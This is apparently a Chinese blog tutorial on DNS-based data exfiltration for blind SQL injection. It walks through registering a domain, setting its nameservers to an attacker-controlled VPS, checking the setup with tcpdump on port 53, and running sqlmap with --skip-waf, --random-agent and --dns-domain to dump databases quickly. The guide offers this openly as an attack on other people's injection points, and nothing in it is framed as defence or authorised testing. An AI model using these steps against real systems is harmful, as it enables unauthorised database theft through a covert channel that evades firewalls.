利用dns注入,快速获取数据,突破延迟盲注等速度限制

首先感受一下利用dns和不利用dns时的速度

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第1张图片

这个是不使用dns,可以看左侧的时间,大概一分钟一条把,实际中这种还算是快的,并且是英文字符

我们再来看使用dns之后(真的不是缓存)

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第2张图片

这是同一个库,使用dns之后,基本是秒速出数据了,速度对比非常明显,

然后我们看怎么操作

 

首先要拥有一个vps(就是一个IP),然后只要再拥有一个域名就可以了,

IP买好以后就不用管了,我们来看域名这边怎么操作

首先我买的是阿里云的域名(不是打广告,毕竟没有广告费,主要是阿里云的好用)

买好之后进入域名列表,选择你需要用的域名进行管理(我买的域名是.xyz的,其他的也行,主要这个便宜,我比较穷)

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第3张图片

进入自定义DNS Host模块,创建两条新的DNS服务器,

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第4张图片

 假设我买的域名是abc.xyz,这里DNS服务器就填写ns1.abc.xyz和ns2.abc.xyz,

如图示,是已经添加完成的,IP地址填你所购买的那台vps的IP,(一定要添加两条,然后记住这两台DNS服务器的名称)

接下来进入DNS修改模块

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第5张图片

 将原本的阿里的服务器改为你刚才设置的那两条DNS服务器,ns1.abc.xyz和ns2.abc.xyz,

然后到此为止设置完成,这些窗口保存后就可以关闭了,接下来进入正式阶段

 

测试一下服务器是否设置成功,进去你的vps,监听53端口

命令:tcpdump udp port 53

在其他任意命令窗口host一下这个域名,

例如host werwer.abc.xyz

在你vps这台服务器上会有对应的响应,如图示,说明已经成功了。

利用dns注入,快速获取数据,突破延迟盲注等速度限制_第6张图片

 

 

好的,再次进入正题,首先你的vps上要安装好sqlmap,(怎么装请自行百度)

其次你要有注入点(没注入点你学这个干嘛!!)

 python sqlmap.py -r abc.txt --skip-waf --random-agent --dns-domain=abc.xyz  --dbs

使用如上命令

最重要的是--dns-domain=abc.xyz

其他的命令与你普通跑时相同,大家都懂把,是的都懂,然后你就会发现已经神速了,接下来跑数据体现飞一般的感觉把!

你可能感兴趣的:(利用dns注入,快速获取数据,突破延迟盲注等速度限制)